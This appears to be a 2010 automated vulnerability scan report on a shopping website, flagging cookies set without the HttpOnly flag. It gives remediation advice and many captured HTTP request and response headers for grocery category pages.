GET /shoes.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:41:29 GMT Connection: close Content-Length: 86462
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /soda-pop.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:52:01 GMT Connection: close Content-Length: 146715
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /spices-herbs.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:43:00 GMT Connection: close Content-Length: 163499
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /stores.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:40:58 GMT Connection: close Content-Length: 70195
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /top-deals_grocery.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:41:54 GMT Connection: close Content-Length: 54583
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /topdealslanding.aspx HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:40:57 GMT Connection: close Content-Length: 56214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /toppings.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:47:37 GMT Connection: close Content-Length: 78425
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /water.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:52:03 GMT Connection: close Content-Length: 161550
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /wine-spirits.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:49:23 GMT Connection: close Content-Length: 167826
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /wipes.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:54:16 GMT Connection: close Content-Length: 164447
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:40:50 GMT Connection: close Content-Length: 59975
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /BrowseLocalL2.aspx HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: /InvalidParameters.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:49:57 GMT Connection: close Content-Length: 142
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fInvalidParameters.aspx">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Home_Selector.aspx HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:41:30 GMT Connection: close Content-Length: 5962
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /air-fresheners.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:52:48 GMT Connection: close Content-Length: 175274
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /baby-food.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:42:02 GMT Connection: close Content-Length: 160152
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /baked-goods.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:42:16 GMT Connection: close Content-Length: 160864
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /baking-oils-spices.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:42:42 GMT Connection: close Content-Length: 177545
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /beer-wine-tobacco.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:49:14 GMT Connection: close Content-Length: 171137
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /beer.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:49:43 GMT Connection: close Content-Length: 161034
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /beverages.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:50:09 GMT Connection: close Content-Length: 175713
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /black-friday.aspx HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:41:33 GMT Connection: close Content-Length: 39724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bread.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:42:19 GMT Connection: close Content-Length: 123538
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /breakfast-bars-pop-tarts.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:52:27 GMT Connection: close Content-Length: 152353
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /breakfast-cereal.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:52:14 GMT Connection: close Content-Length: 169389
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browselocall1.aspx?N=133251&more=533642 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:47:54 GMT Connection: close Content-Length: 123310
